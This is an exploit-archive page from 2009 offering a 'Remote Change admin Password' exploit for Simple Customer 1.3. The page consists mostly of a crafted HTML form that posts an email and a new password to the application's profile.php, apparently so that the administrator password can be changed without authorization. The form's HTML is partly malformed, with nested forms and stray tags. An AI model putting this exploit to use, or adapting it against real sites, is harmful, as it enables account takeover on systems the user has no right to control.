[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Simple Customer 1.3 Arbitrary Change Admin Password Exploit
# Published : 2009-05-07
# Author : ahmadbady
# Previous Title : ST-Gallery 0.1a Multiple SQL Injection Vulnerabilities
# Next Title : Job Script 2.0 Arbitrary Change Admin Password Exploit
---- Remote Change admin Password----
----------------------------
script:Simple Customer 1.3
----------------------------
Author: ahmadbady
email:kivi_hacker666@yahoo.com
--------------------
download from:http://www.simplecustomer.com/ New (Version 1.3)
--------------------
xpl:
</head>
<body>
<form action="http://www.simplecustomer.com/demo/profile.php" method="post">
<div class="container">
<div class="leftcolumn">
<h2>coded by ahmadbady</h2>
</span>
<form id="form1" name="form1" method="post" action="">
<p>Email
<br />
<input name="email" type="text" id="email" value="" class="required validate-email" size="35" />
</p>
<p><br />
<input name="password" type="password" id="password" />
<br />
</p>
<p>Home Page<br />
<input name="Submit2" type="submit" id="Submit2" value="Update" />
</p>
</form>
# www.Syue.com [2009-05-07]